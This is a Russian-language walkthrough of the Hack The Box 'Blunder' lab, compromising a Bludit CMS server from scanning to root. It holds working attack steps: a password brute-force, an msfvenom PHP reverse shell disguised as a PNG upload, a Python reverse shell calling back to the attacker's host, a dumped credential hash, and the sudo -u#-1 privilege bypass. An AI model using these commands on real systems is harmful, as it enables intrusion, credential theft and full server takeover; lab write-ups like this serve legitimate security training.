Обзор сервисов

$ nmapAutomator.sh -H 10.10.10.191 -t Full

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts
gobuster dir -u http://10.10.10.191 -w /usr/share/wordlists/dirb/common.txt -x txt,pdf,php

В найденном файле http://10.10.10.191/todo.txt упоминается пользователь fergus

Создадим свой словарь с паролями

Скачаем https://github.com/digininja/CeWL

cewl http://10.10.10.191 > list.txt

Брутфорс

$ ruby 48746.rb -r https://10.10.10.191 -u fergus -w list.txt
fergus:RolandDeschain

Публичный эксплоит

msfvenom -p php/reverse_php LHOST=10.10.14.6 LPORT=1234 -f raw -b '"' > evil.png
echo -e "<?php $(cat evil.png)" > evil.png
echo "RewriteEngine off" > .htaccess
echo "AddType application/x-httpd-php .png" >> .htaccess
searchsploit -m multiple/webapps/48701.txt
python3 exp.py
nc -lnvp 1234
curl http://10.10.10.191/bl-content/tmp/temp/evil.png
$ cat /var/www/bludit-3.10.0a/bl-content/databases/users.php

"admin": {
        "nickname": "Hugo",
        "firstName": "Hugo",
        "lastName": "",
        "role": "User",
        "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
        "email": "",
        "registered": "2019-11-27 07:40:55",
        "tokenRemember": "",
        "tokenAuth": "b380cb62057e9da47afce66b4615107d",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "instagram": "",
        "codepen": "",
        "linkedin": "",
        "github": "",
        "gitlab": ""}

Хеш из поля password учётной записи admin находится в базе crackstation.com: Password120

Получаем нормальный шелл:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.6",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
nc -lnvp 1235

Пользовательский флаг

$ su - hugo
hugo@blunder:~$ ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:50:56:b9:cb:58 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.191/24 brd 10.10.10.255 scope global noprefixroute ens33
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:cb58/64 scope global dynamic mngtmpaddr noprefixroute
       valid_lft 86135sec preferred_lft 14135sec
    inet6 fe80::250:56ff:feb9:cb58/64 scope link noprefixroute
       valid_lft forever preferred_lft forever
hugo@blunder:~$ cat user.txt
78cd90414dca08cfbd6b5f900249367d

Повышение привилегий

hugo@blunder:~$ sudo -l
Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash

Таким образом, hugo может запускать sudo /bin/bash от имени любого пользователя, кроме root. Однако уязвимая версия sudo интерпретирует идентификатор пользователя -1 как 0, поэтому ограничение !root обходится (в исправленных версиях sudo такой идентификатор отвергается):

sudo -u#-1 /bin/bash

Флаг суперпользователя

root@blunder:/root# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:50:56:b9:cb:58 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.191/24 brd 10.10.10.255 scope global noprefixroute ens33
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:cb58/64 scope global dynamic mngtmpaddr noprefixroute
       valid_lft 86283sec preferred_lft 14283sec
    inet6 fe80::250:56ff:feb9:cb58/64 scope link noprefixroute
       valid_lft forever preferred_lft forever
root@blunder:/root# cat root.txt
2eeee0cae3c2c3d7d66eb86558e8d8ab